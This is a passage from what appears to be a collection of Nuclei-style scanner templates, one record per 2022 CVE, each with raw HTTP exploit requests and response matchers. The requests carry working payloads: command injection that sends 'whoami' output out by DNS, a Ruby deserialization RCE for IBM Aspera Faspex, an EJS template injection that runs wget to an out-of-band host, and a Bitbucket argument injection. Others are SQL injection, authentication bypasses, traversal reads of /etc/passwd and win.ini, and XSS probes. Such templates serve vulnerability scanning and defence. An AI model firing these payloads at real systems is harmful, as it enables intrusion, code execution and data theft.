<0.9.8.1147 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password=toor&commit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Login Redirect."]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","group":1,"regex":["([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-24266","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\norder_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"list_admin_table\")"],"condition":"and"}]}]},{"id":"CVE-2022-47986","info":{"name":"IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /aspera/faspex/package_relay/relay_package HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"package_file_list\": [\"/\"], \"external_emails\": \"\\n---\\n- !ruby/object:Gem::Installer\\n    i: x\\n- !ruby/object:Gem::SpecFetcher\\n    i: y\\n- !ruby/object:Gem::Requirement\\n  requirements:\\n    !ruby/object:Gem::Package::TarReader\\n    io: &1 !ruby/object:Net::BufferedIO\\n      io: &1 !ruby/object:Gem::Package::TarReader::Entry\\n         read: 0\\n         header: \\\"pew\\\"\\n      debug_output: &1 !ruby/object:Net::WriteAdapter\\n         socket: &1 !ruby/object:PrettyPrint\\n             output: !ruby/object:Net::WriteAdapter\\n                 socket: &1 !ruby/module \\\"Kernel\\\"\\n                 method_id: :eval\\n             newline: \\\"throw `id`\\\"\\n             buffer: {}\\n             group_stack:\\n              - !ruby/object:PrettyPrint::Group\\n                break: true\\n         method_id: :breakable\\n\", \"package_name\": \"{{rand_base(4)}}\", \"package_note\": \"{{randstr}}\", \"original_sender_name\": \"{{randstr}}\", \"package_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"metadata_human_readable\": \"Yes\", \"forward\": \"pew\", \"metadata_json\": \"{}\", \"delivery_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"delivery_sender_name\": \"{{rand_base(8)}}\", \"delivery_title\": \"{{rand_base(4)}}\", \"delivery_note\": \"{{rand_base(4)}}\", \"delete_after_download\": true, \"delete_after_download_condition\": \"IDK\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-4050","info":{"name":"WordPress JoomSport <5.2.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmdId=1&shattr={\"id\":\"1+AND+(SELECT+1+FROM(SELECT+SLEEP(7))aaaa);--+-\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"jscaruselcont jsview2\")"],"condition":"and"}]}]},{"id":"CVE-2022-34590","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hms/admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Admin  | Dashboard</title>","Manage Patients","Manage Doctors"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34328","info":{"name":"PMB 7.3.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>' target='cart_info"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4897","info":{"name":"WordPress BackupBuddy <8.8.3 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.11\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"onload=alert(document.domain)\")","contains(body_2, \"BackupBudddy iFrame\")"],"condition":"and"}]}]},{"id":"CVE-2022-22954","info":{"name":"VMware Workspace ONE Access - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Authorization context is not valid"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-36804","info":{"name":"Atlassian Bitbucket - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /rest/api/latest/repos HTTP/1.1\nHost: {{Hostname}}\n","GET /rest/api/latest/projects/{{key}}/repos/{{slug}}/archive?filename={{data}}&at={{data}}&path={{data}}&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","words":["com.atlassian.bitbucket.scm.CommandFailedException"]},{"type":"status","status":[500]}],"extractors":[{"type":"json","name":"key","internal":true,"json":[".[\"values\"] | .[] | .[\"project\"] | .key"],"part":"body"},{"type":"json","name":"slug","internal":true,"json":[".[\"values\"] | .[]  | .slug"],"part":"body"},{"type":"regex","group":1,"regex":["uid=.*\\(([a-z]+)\\):"]}]}]},{"id":"CVE-2022-0412","info":{"name":"WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["Product not found"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-48012","info":{"name":"OpenCATS 0.9.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /index.php?m=settings&a=ajax_tags_upd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntag_title=<script>alert(document.domain);</script>\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"opencats - Login\")","contains(body_3, \"<script>alert(document.domain);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-0271","info":{"name":"LearnPress <4.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"dismissed\":\"xxx<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37299","info":{"name":"Shirne CMS 1.2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cm9vd"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47945","info":{"name":"Thinkphp Lang - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?lang=../../thinkphp/base","{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Call Stack","class=\"trace"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-36537","info":{"name":"ZK Framework - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /login.zul HTTP/1.1\nHost: {{Hostname}}\n","POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Length: 154\n\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Disposition: form-data; name=\"nextURI\"\n\n/WEB-INF/web.xml\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp--\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<display-name>.*</display-name>","<welcome-file-list>((.|\n)*)welcome-file-list>","xml version","web-app"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"dtid","group":1,"regex":["dt:'(.*?)',cu:"],"internal":true}]}]},{"id":"CVE-2022-0651","info":{"name":"WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home'-sleep(6)-'&current_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, 'Visitor Hit was recorded successfully')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-zA-Z]+)"],"internal":true}]}]},{"id":"CVE-2022-46073","info":{"name":"Helmet Store Showroom - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Helmet Store Showroom\")","contains(body, \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-41473","info":{"name":"RPCMS 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","rpcms"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43166","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-28080","info":{"name":"Royal Event - SQL Injection","severity":"high"},"requests":[{"raw":["POST /royal_event/ HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 353\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"login\"\n\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD--\n","POST /royal_event/btndates_report.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD\n\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"todate\"\n\n1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(\"{{randstr}}\"),0x1,0x2),NULL-- -\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"search\"\n\n3\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"fromdate\"\n\n01/01/2011\n------WebKitFormBoundaryFboH5ITu7DsGIGrD--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5(\"{{randstr}}\")}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25148","info":{"name":"WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id=sleep(6)&search_query&page_uri=/&user_id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"application/json\")","contains(body, 'Visitor Hit was recorded successfully')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-zA-Z]+)"],"internal":true}]}]},{"id":"CVE-2022-42233","info":{"name":"Tenda 11N - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /index.asp HTTP/1.1\nHost: {{Hostname}}\nCookie: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword","Tenda 11N"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["GoAhead-Webs"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1442","info":{"name":"WordPress Metform <=2.1.3 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["mf_recaptcha_secret_key","admin_email_from"],"condition":"and"},{"type":"word","part":"header_2","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<option value=\\\"([0-9]+)\\\""],"internal":true}]}]},{"id":"CVE-2022-38817","info":{"name":"Dapr Dashboard 0.1.0-0.10.0 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/statestore","{{BaseURL}}/overview","{{BaseURL}}/controlplane"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Dapr Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26564","info":{"name":"HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>","{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1","{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>javascript:alert('XSS')</script>","HotelDruid"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4447","info":{"name":"WordPress Fontsy <=1.8.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=-5219 UNION ALL SELECT NULL,NULL,NULL,md5({{num}}),NULL--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{{md5(num)}}\")"],"condition":"and"}]}]},{"id":"CVE-2022-25216","info":{"name":"DVDFab 12 Player/PlayerFab - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34267","info":{"name":"RWS WorldServer - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /ws-api/v2/users/me/details?token=02 HTTP/2\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"fullName\":\"System\""]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35151","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","\u56fe\u7247\u9884\u89c8"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26159","info":{"name":"Ametys CMS Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm"],"matchers-condition":"and","matchers":[{"type":"word","words":["<auto-completion>","<item>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29153","info":{"name":"HashiCorp Consul/Consul Enterprise - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["PUT /v1/agent/check/register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\":\"{{randstr}}\",\"name\":\"TEST NODE\",\"method\":\"GET\",\"http\":\"http://oast.me\",\"interval\":\"10s\",\"timeout\":\"1s\",\"disable_redirects\":true}\n","PUT /v1/agent/check/deregister/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["unknown field \"disable_redirects\""]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-29455","info":{"name":"WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '<= 3.5.5')"]},{"type":"word","part":"body","words":["Elementor Website Builder"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2022-25485","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertLightbox.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42094","info":{"name":"Backdrop CMS version 1.23.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_id\"\n\ncard_node_form\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-13\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[time]\"\n\n21:49:36\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"comment\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryWEcZgRB4detkrGaY--\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-30776","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error: 1<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2863","info":{"name":"WordPress WPvivid Backup <0.9.76 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=WPvivid HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/wp-admin/admin.php?page=WPvivid\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"_ajax_nonce\":\"([0-9a-z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-25356","info":{"name":"Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception: Error while [Loading XML","&lt;RegKey&gt;","&lt;IsAdmin&gt;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23854","info":{"name":"AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","extensions"],"condition":"and"},{"type":"word","part":"header","words":["text/ini","application/octet-stream"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3578","info":{"name":"WordPress ProfileGrid <5.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=pm_add_group&id=\"><script>alert%28document.domain%29<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, \"Extension Options\")","contains(body_2, \"<script>alert(document.domain)</script>&tab\")"],"condition":"and"}]}]},{"id":"CVE-2022-29078","info":{"name":"Node.js Embedded JavaScript 3.1.6 - Template Injection","severity":"critical"},"requests":[{"raw":["GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["You are viewing page number"]}]}]},{"id":"CVE-2022-3242","info":{"name":"Microweber <1.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\") && contains(tolower(body), \"microweber\")"],"condition":"and"}]}]},{"id":"CVE-2022-3768","info":{"name":"WordPress WPSmartContracts <1.3.12 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: 